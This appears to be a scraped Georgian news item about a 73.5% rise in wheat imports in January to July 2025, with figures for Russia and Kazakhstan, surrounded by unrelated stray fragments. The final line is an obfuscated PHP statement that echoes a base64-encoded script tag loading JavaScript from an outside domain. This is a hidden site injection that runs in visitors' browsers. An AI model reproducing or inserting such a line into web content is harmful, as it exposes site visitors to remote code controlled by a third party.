global distribution
გარე ავეჯი

 საქართველოში ხორბლის იმპორტი 73.5%-ით გაიზარდა . სტატისტიკის ეროვნული სამსახურის მონაცემებით, 2025 წლის იანვარ-ივლისში ქვეყანაში 56.067 მლნ დოლარის ღირებულების 218.2 ათასი ტონა ხორბალი შემოვიდა, გასული წლის ანალოგიურ პერიოდში კი 32.308 მლნ დოლარის ღირებულების 134.3 ათასი ტონა.

ტრადიციულად, ხორბლის მთავარი იმპორტიორი წელსაც რუსეთი იყო, სადაც 7 თვეში 39.218 მლნ დოლარის, 147.1 ათასი პროდუქტი ვიყიდეთ, 16.843 მლნ დოლარის ღირებულების, 71.1 ათასი ტონა ხორბალი კი ყაზახეთიდან შემოვიდა.
შესაბამისად, გამოდის, რომ ერთი ტონა რუსული ხორბლის იმპორტი (გადასახადების გარეშე) საშუალოდ 267 დოლარი დაგვიჯდა, ყაზახურის კი 236 დოლარი.
157
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");